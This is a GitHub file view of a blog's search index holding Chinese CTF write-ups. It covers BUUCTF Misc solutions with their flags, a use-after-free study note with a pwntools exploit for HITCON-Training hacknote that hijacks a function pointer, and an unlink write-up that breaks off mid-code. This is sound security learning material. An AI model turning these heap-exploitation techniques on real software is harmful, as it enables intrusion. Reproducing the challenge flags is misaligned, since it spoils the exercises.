-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsearch.xml
More file actions
374 lines (180 loc) · 227 KB
/
search.xml
File metadata and controls
374 lines (180 loc) · 227 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>BUUCTF-Misc刷题记录</title>
<link href="/2026/02/24/buuctf-misc-1/"/>
<url>/2026/02/24/buuctf-misc-1/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="你竟然赶我走">你竟然赶我走</h2><p><img src="/images/buuctf-misc-1/%E4%BD%A0%E7%AB%9F%E7%84%B6%E8%B5%B6%E6%88%91%E8%B5%B0.PNG" alt="你竟然赶我走.PNG"></p><div class="code-wrapper"><pre><code class="hljs text">flag{stego_is_s0_bor1ing}</code></pre></div><h2 id="大白">大白</h2><p>文件属性中存在异常,猜测是修改了图片高度<br><img src="/images/buuctf-misc-1/dabai1.png" alt><br>在010 Editor中得到<code>00 00 02 A7</code>和<code>00 00 01 00</code>,分别为图片的宽高,将图片宽高设置为一致:<br><img src="/images/buuctf-misc-1/dabai2.png" alt></p><h2 id="乌镇峰会种图">乌镇峰会种图</h2><p>跟<code>你竟然赶我走</code>思路一样</p><h2 id="n种方法解决">N种方法解决</h2><p>得到一个exe,甩vsc里看到这长长一大坨:</p><p><img src="/images/buuctf-misc-1/n-way-1.png" alt></p><p>用浏览器访问:<br><img src="/images/buuctf-misc-1/n-way-2.png" alt><br>扫一下:<br>得出来的flag要改一下</p><div class="code-wrapper"><pre><code class="hljs text">flag{dca57f966e4e4e31fd5b15417da63269}</code></pre></div><h2 id="基础破解">基础破解</h2><p>伪随机数爆破<br>之后base64解码</p><div class="code-wrapper"><pre><code class="hljs text">flag{70354300a5100ba78068805661b93a5c}</code></pre></div><h2 id="文件中的秘密">文件中的秘密</h2><p>查看文件属性<br><img src="/images/buuctf-misc-1/file-secret.png" alt></p><h2 id="zip伪加密">zip伪加密</h2><p>一样伪随机数爆破</p><div class="code-wrapper"><pre><code class="hljs text">flag{Adm1N-B2G-kU-SZIP}</code></pre></div><h2 id="qr">qr</h2><p>扫描一下二维码提示可以复制一些内容</p><div class="code-wrapper"><pre><code class="hljs text">欢迎参加本次比赛,密码为 Flag{878865ce73370a4ce607d21ca01b5e59}</code></pre></div><h2 id="wireshark">wireshark</h2><div class="code-wrapper"><pre><code class="hljs text">黑客通过wireshark抓到管理员登陆网站的一段流量包(管理员的密码即是答案) 注意:得到的 flag 请包上 flag{} 提交</code></pre></div><p>根据提示直接过滤出POST包:</p><div class="code-wrapper"><pre><code class="hljs text">http.request.method==POST</code></pre></div><p><img src="/images/buuctf-misc-1/wireshark.png" alt></p><div class="code-wrapper"><pre><code class="hljs text">flag{ffb7567a1d4f4abdffdb54e022f8facd}</code></pre></div><h2 id="被嗅探的流量">被嗅探的流量</h2><p>先过滤常见的POST方式的流量,其中一项看到有flag字样,之后follow这个流:<br><img src="/images/buuctf-misc-1/%E8%A2%AB%E5%97%85%E6%8E%A2%E7%9A%84%E6%B5%81%E9%87%8F.png" alt></p><div class="code-wrapper"><pre><code class="hljs text">flag{da73d88936010da1eeeb36e945ec4b97}</code></pre></div>]]></content>
<categories>
<category> Misc </category>
</categories>
<tags>
<tag> BUUCTF </tag>
<tag> CTF </tag>
<tag> Misc </tag>
</tags>
</entry>
<entry>
<title>UAF学习记录</title>
<link href="/2026/02/20/use-after-free-learning/"/>
<url>/2026/02/20/use-after-free-learning/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><p><code>Use After Free</code>即其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况:</p><ul><li>内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。</li><li>内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么<strong>程序很有可能可以正常运转</strong>。</li><li>内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,<strong>就很有可能会出现奇怪的问题</strong>。</li></ul><blockquote><p>一般所指的Use After Free漏洞主要是后两种,一般将释放后没有被设置为NULL的内存指针为<strong>dangling pointer</strong></p></blockquote><h2 id="案例分析">案例分析</h2><blockquote><p>可以用ubuntu16来跑这个代码</p></blockquote><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">name</span> {</span> <span class="hljs-type">char</span> *myname; <span class="hljs-type">void</span> (*func)(<span class="hljs-type">char</span> *str);} NAME;<span class="hljs-type">void</span> <span class="hljs-title function_">myprint</span><span class="hljs-params">(<span class="hljs-type">char</span> *str)</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, str); }<span class="hljs-type">void</span> <span class="hljs-title function_">printmyname</span><span class="hljs-params">()</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"call print my name\n"</span>); }<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> { NAME *a; a = (NAME *)<span class="hljs-built_in">malloc</span>(<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">struct</span> name)); a->func = myprint; a->myname = <span class="hljs-string">"I can also use it"</span>; a->func(<span class="hljs-string">"this is my function"</span>); <span class="hljs-comment">// free without modify</span> <span class="hljs-built_in">free</span>(a); a->func(<span class="hljs-string">"I can also use it"</span>); <span class="hljs-comment">// free with modify</span> a->func = printmyname; a->func(<span class="hljs-string">"this is my function"</span>); <span class="hljs-comment">// set NULL</span> a = <span class="hljs-literal">NULL</span>; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"this pogram will crash...\n"</span>); a->func(<span class="hljs-string">"can not be printed..."</span>);}</code></pre></div><p>运行后观察到虽然我们 free 掉 a 指针,但是 a 指向的函数 myprint 依旧可以被调用,并且可以被修改为调用 printmyname,直到 a 被置为空以后才发生了 Segmention fault 。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-built_in">free</span>(a);a->func(<span class="hljs-string">"I can also use it"</span>);<span class="hljs-comment">// free with modify</span>a->func = printmyname;a->func(<span class="hljs-string">"this is my function"</span>);</code></pre></div><p>看到myprint()函数依然可以被调用,并且成功执行打印出字符串。我们继续往下看,接下来不仅仅是对函数的调用了,而是直接将func成员变量中的函数指针更改成了printmyname()函数,并且调用func成员变量。虽然printmyname()函数不需要参数,但为了能够让程序认为这里依然是myprint()函数,并且认为我们的操作是合法的,所以传入了参数"this is my function",再往后观察到,即使我们改变了成员变量中的函数指针,依然可以顺利执行printmyname()函数,并打印出printmyname()函数中原有打印“call print my name”的功能。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">// set NULL</span>a = <span class="hljs-literal">NULL</span>;<span class="hljs-built_in">printf</span>(<span class="hljs-string">"this pogram will crash...\n"</span>);a->func(<span class="hljs-string">"can not be printed..."</span>);</code></pre></div><p>之后将a结构体置空,打印出一个提示字符串,这样一来程序再一次调用func成员变量,看到只出现了提示标语,而没有出现调用func成员变量执行printmyname()函数的功能。这样一个例子可以很直观的体现出结构体指针在释放之后置空的重要性,以及没有置空情况下我们可以做些什么。</p><h2 id="例题:-hitcon-training-hacknote">例题: <a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/user-mode/heap/use_after_free/hitcon-training-hacknote">HITCON-Training-hacknote</a></h2><h3 id="程序分析">程序分析</h3><h4 id="检查保护">检查保护</h4><div class="code-wrapper"><pre><code class="hljs bash">zer0ptr@DESKTOP-65QJLFA:~/Pwn/UAF$ checksec hacknote[*] <span class="hljs-string">'/home/zer0ptr/Pwn/UAF/hacknote'</span> Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No</code></pre></div><h4 id="静态分析">静态分析</h4><p><img src="/images/uaf-hitcon-lab10/magic.png" alt></p><p>这里发现了一个魔法函数,记着应该有用。</p><h5 id="add-note">add_note()</h5><p>根据程序,我们可以看出程序最多可以添加 5 个 note。每个 note 有两个字段: <code>void (*printnote)();</code> 与<code>char *content;</code>,其中<code>printnote</code>会被设置为一个函数,其函数功能为输出 <code>content</code> 具体的内容。</p><p>note 的结构体定义如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">note</span> {</span> <span class="hljs-type">void</span> (*printnote)(); <span class="hljs-type">char</span> *content;};</code></pre></div><p>add_note 函数代码如下:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">add_note</span><span class="hljs-params">()</span>{ note *v0; <span class="hljs-comment">// ebx</span> <span class="hljs-type">signed</span> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [esp+Ch] [ebp-1Ch]</span> <span class="hljs-type">int</span> size; <span class="hljs-comment">// [esp+10h] [ebp-18h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+14h] [ebp-14h]</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [esp+1Ch] [ebp-Ch]</span> v5 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-keyword">if</span> ( count <= <span class="hljs-number">5</span> ) { <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">4</span>; ++i ) { <span class="hljs-keyword">if</span> ( !notelist[i] ) { notelist[i] = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">8u</span>); <span class="hljs-keyword">if</span> ( !notelist[i] ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Alloca Error"</span>); <span class="hljs-built_in">exit</span>(<span class="hljs-number">-1</span>); } notelist[i]->put = print_note_content; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Note size :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">8u</span>); size = atoi(&buf); v0 = notelist[i]; v0->content = <span class="hljs-built_in">malloc</span>(size); <span class="hljs-keyword">if</span> ( !notelist[i]->content ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Alloca Error"</span>); <span class="hljs-built_in">exit</span>(<span class="hljs-number">-1</span>); } <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Content :"</span>); read(<span class="hljs-number">0</span>, notelist[i]->content, size); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Success !"</span>); ++count; <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v5; } } } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Full"</span>); } <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v5;}</code></pre></div><p>如果notelist+i是空字节则创建一个8字节的chunk,创建完成之后会在进行一次if判断,接着放置print_note_content()函数指针</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl <span class="hljs-title function_">print_note_content</span><span class="hljs-params">(<span class="hljs-type">int</span> a1)</span>{ <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(*(<span class="hljs-type">const</span> <span class="hljs-type">char</span> **)(a1 + <span class="hljs-number">4</span>));}</code></pre></div><p>可以看到print_note_content()会输出a1加四地址处的变量,接着读入buf并将buf的大小赋值到size并在v0+4的位置malloc一个size大小的空间</p><blockquote><p>程序会调用read函数将输入的内容放在<code>*((void **)*(&notelist + i) + 1</code>处, 这里无法进行溢出</p></blockquote><h5 id="print-note">print_note()</h5><p>print_note 就是简单的根据给定的 note 的索引来输出对应索引的 note 的内容:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">print_note</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [esp+4h] [ebp-14h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+8h] [ebp-10h]</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [esp+Ch] [ebp-Ch]</span> v3 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Index :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">4u</span>); v1 = atoi(&buf); <span class="hljs-keyword">if</span> ( v1 < <span class="hljs-number">0</span> || v1 >= count ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Out of bound!"</span>); _exit(<span class="hljs-number">0</span>); } <span class="hljs-keyword">if</span> ( notelist[v1] ) notelist[v1]->put(notelist[v1]); <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v3;}</code></pre></div><h5 id="delete-note">delete_note</h5><p>delete_note 会根据给定的索引来释放对应的 note。但是值得注意的是,在删除的时候,只是单纯进行了 free,而没有设置为 NULL,那么显然,这里是存在 Use After Free 的情况的。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">del_note</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [esp+4h] [ebp-14h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+8h] [ebp-10h]</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [esp+Ch] [ebp-Ch]</span> v3 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Index :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">4u</span>); v1 = atoi(&buf); <span class="hljs-keyword">if</span> ( v1 < <span class="hljs-number">0</span> || v1 >= count ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Out of bound!"</span>); _exit(<span class="hljs-number">0</span>); } <span class="hljs-keyword">if</span> ( notelist[v1] ) { <span class="hljs-built_in">free</span>(notelist[v1]->content); <span class="hljs-built_in">free</span>(notelist[v1]); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Success"</span>); } <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v3;}</code></pre></div><ol><li><p>释放<code>notelist+v1+1</code>处的chunk</p></li><li><p>然后释放<code>notelist+v1</code>处的chunk</p></li><li><p>free这两个chunk时chunk指针并没有被置空</p></li></ol><h4 id="动态调试">动态调试</h4><p><a href="https://www.bilibili.com/video/BV1L8411m7xW/?spm_id_from=333.337.search-card.all.click&vd_source=302a892bb778bc77294aa18fcca329b7">l140w4n9 - Linux堆溢出Use After Free</a></p><blockquote><p>太懒了后面补上</p></blockquote><h4 id="利用姿势">利用姿势</h4><blockquote><p>通过 use after free 来使得这个程序执行 magic 函数:<strong>一个很直接的想法是修改 note 的<code>printnote</code>字段为 magic 函数的地址,从而实现在执行<code>printnote</code> 的时候执行 magic 函数</strong></p></blockquote><p>我们来看看如何实现:</p><ol><li>程序申请 8 字节内存用来存放 note 中的 printnote 以及 content 指针。</li><li>程序根据输入的 size 来申请指定大小的内存,然后用来存储 content。</li></ol><p><img src="/images/uaf-hitcon-lab10/uaf_exp.png" alt></p><h5 id="details">Details</h5><ul><li>申请 note0,real content size 为 16(大小与 note 大小所在的 bin 不一样即可)</li><li>申请 note1,real content size 为 16(大小与 note 大小所在的 bin 不一样即可)</li><li>释放 note0</li><li>释放 note1</li><li>此时,大小为 16 的 fast bin chunk 中链表为 <code>note1->note0</code></li><li>申请 note2,并且设置 real content 的大小为 8,那么根据堆的分配规则,note2 其实会分配 note1 对应的内存块(因为我们先释放的是 note0 再释放的 note1,那么 note1 就是链表的尾部,fast bin 是先进后出的,直接对链表尾进行操作)</li><li>所以 real content 对应的 chunk 其实是 note0</li><li>如果我们这时候向 note2 real content 的 chunk 部分写入 magic 的地址,那么由于我们没有 note0 为 NULL。当我们再次尝试输出 note0 的时候,程序就会调用 magic 函数</li></ul><h4 id="exp">EXP</h4><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *r = process(<span class="hljs-string">'./hacknote'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">addnote</span>(<span class="hljs-params">size, content</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"1"</span>) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(size).encode()) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">delnote</span>(<span class="hljs-params">idx</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"2"</span>) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">printnote</span>(<span class="hljs-params">idx</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"3"</span>) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(idx).encode())magic = <span class="hljs-number">0x08048986</span>addnote(<span class="hljs-number">16</span>, <span class="hljs-string">b"aaaa"</span>) <span class="hljs-comment"># add note 0</span>addnote(<span class="hljs-number">16</span>, <span class="hljs-string">b"ddaa"</span>) <span class="hljs-comment"># add note 1</span>delnote(<span class="hljs-number">0</span>) <span class="hljs-comment"># delete note 0</span>delnote(<span class="hljs-number">1</span>) <span class="hljs-comment"># delete note 1</span>addnote(<span class="hljs-number">8</span>, p32(magic)) <span class="hljs-comment"># add note 2</span>printnote(<span class="hljs-number">0</span>) <span class="hljs-comment"># print note 0</span>r.interactive()</code></pre></div><p><img src="/images/uaf-hitcon-lab10/getshell.png" alt></p><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/use-after-free/#_3">Use After Free</a></li></ul></li><li><p>CSDN</p><ul><li><a href="https://blog.csdn.net/qq_41202237/article/details/108797478">好好说话之Use After Free</a></li><li><a href="https://blog.csdn.net/m0_57836225/article/details/143894272">PWN -UAF(Use After Free)漏洞解析</a></li></ul></li><li><p>CNBLOGS</p><ul><li><a href="https://www.cnblogs.com/happynoy/p/16276285.html"> [BUUCTF]刷题记录:hitcontraining_uaf</a></li><li><a href="https://www.cnblogs.com/welkinchan/p/12212989.html">UAF——use after free</a></li></ul></li><li><p>Blogs</p><ul><li><a href="https://yufeiyu33.github.io/posts/41088.html">UAF漏洞(hitcontraining_uaf)</a></li><li><a href="https://yyyffff.github.io/2025/08/02/%E4%B8%80%E4%BA%9B%E9%A2%98%E7%9B%AE%E8%AE%B0%E5%BD%95/">一些题目记录 - HITCON-training lab 10 hacknote</a></li><li><a href="https://c1oudfl0w0.github.io/blog/2025/03/02/Use-After-Free/#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">Use After Free</a></li><li><a href="https://darkwing.moe/2019/06/25/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B022-Use-After-Free/">Pwn学习笔记22:Use After Free</a></li><li><a href="https://tangzichengcc.github.io/pwn%E5%85%A5%E9%97%A8-15-%E5%A0%86%E5%88%A9%E7%94%A8%E4%B9%8BUse-After-Free/">pwn入门-15-堆利用之Use-After-Free</a></li></ul></li><li><p>先知</p><ul><li><a href="https://xz.aliyun.com/news/6742">Hitcon Traning Lab10做题笔记 —— UAF漏洞分析</a></li><li><a href="https://xz.aliyun.com/news/13928">堆利用Use After Free 详解</a></li><li><a href="https://binhack.readthedocs.io/zh/latest/heap/uaf.html"> 二进制安全学习笔记 - 11.1. Use After Free</a></li></ul></li><li><p>Bilibili</p><ul><li><a href="https://www.bilibili.com/video/BV1L8411m7xW/?spm_id_from=333.337.search-card.all.click&vd_source=302a892bb778bc77294aa18fcca329b7">Linux堆溢出Use After Free</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Pwn </tag>
<tag> Heap </tag>
<tag> UAF </tag>
</tags>
</entry>
<entry>
<title>hitcon-training-unlink writeup</title>
<link href="/2026/02/14/hitcon-training-unlink/"/>
<url>/2026/02/14/hitcon-training-unlink/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="checksec">Checksec</h2><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Pwn/heap/unlink/hitcontraining_unlink [15:14:56]</span>$ checksec bamboobox[*] <span class="hljs-string">'/home/zer0ptr/CTF-Pwn/heap/unlink/hitcontraining_unlink/bamboobox'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No</code></pre></div><p><strong>NO PIE</strong></p><h2 id="分析">分析</h2><h4 id="main函数">main函数</h4><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span>{ <span class="hljs-type">void</span> (**v4)(<span class="hljs-type">void</span>); <span class="hljs-comment">// [rsp+8h] [rbp-18h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v6; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span> v6 = __readfsqword(<span class="hljs-number">0x28u</span>); setvbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>); setvbuf(<span class="hljs-built_in">stdin</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>); v4 = (<span class="hljs-type">void</span> (**)(<span class="hljs-type">void</span>))<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10u</span>); *v4 = (<span class="hljs-type">void</span> (*)(<span class="hljs-type">void</span>))hello_message; v4[<span class="hljs-number">1</span>] = (<span class="hljs-type">void</span> (*)(<span class="hljs-type">void</span>))goodbye_message; (*v4)(); <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { menu(); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); <span class="hljs-keyword">switch</span> ( atoi(buf) ) { <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>: show_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>: add_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>: change_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">4</span>: remove_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">5</span>: v4[<span class="hljs-number">1</span>](); <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>); <span class="hljs-keyword">default</span>: <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild choice!!!"</span>); <span class="hljs-keyword">break</span>; } }}</code></pre></div><p>然后ida反编译查看main函数,各功能一目了然。注意到每次输入choice后,都要通过atoi()函数来将其转为整型,这是漏洞利用的关键之一;</p><p>show_item:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">show_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+Ch] [rbp-4h]</span> <span class="hljs-keyword">if</span> ( !num ) <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No item in the box"</span>); <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">99</span>; ++i ) { <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) ) <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d : %s"</span>, i, *((<span class="hljs-type">const</span> <span class="hljs-type">char</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * i)); } <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(byte_401089);}</code></pre></div><ol><li>这里存在offbyone,但对于考察unlink的题目一般不会利用;</li><li><code>&unk_6020c8</code>位于bss节,是items的基址</li></ol><p>add_item:</p><div class="code-wrapper"><pre><code class="hljs c">__int64 <span class="hljs-title function_">add_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+4h] [rbp-1Ch]</span> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-18h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v4; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span> v4 = __readfsqword(<span class="hljs-number">0x28u</span>); <span class="hljs-keyword">if</span> ( num > <span class="hljs-number">99</span> ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"the box is full"</span>); } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the length of item name:"</span>); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); v2 = atoi(buf); <span class="hljs-keyword">if</span> ( !v2 ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild length"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; } <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">99</span>; ++i ) { <span class="hljs-keyword">if</span> ( !*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) ) { *((_DWORD *)&itemlist + <span class="hljs-number">4</span> * i) = v2; *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) = <span class="hljs-built_in">malloc</span>(v2); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the name of item:"</span>); *(_BYTE *)(*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) + (<span class="hljs-type">int</span>)read(<span class="hljs-number">0</span>, *((<span class="hljs-type">void</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * i), v2)) = <span class="hljs-number">0</span>; ++num; <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; } } } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>add_item函数中,先输入一个长度v2,然后遍历bss中的空间(基址为0x6020c8),如果有空,则申请一块v2大小的chunk(这里所说的chunk大小不包括chunk头),将其地址写入bss。再输入一个字符串,将前v2个字节作为item名称写到chunk中。line 30的read函数返回实际读取的字节数,加上该字符串基址就是字符串的末尾,结尾置0表示字符串结束;</p><p>change_item:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> __int64 <span class="hljs-title function_">change_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [rsp+4h] [rbp-2Ch]</span> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-28h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-20h] BYREF</span> <span class="hljs-type">char</span> nptr[<span class="hljs-number">8</span>]; <span 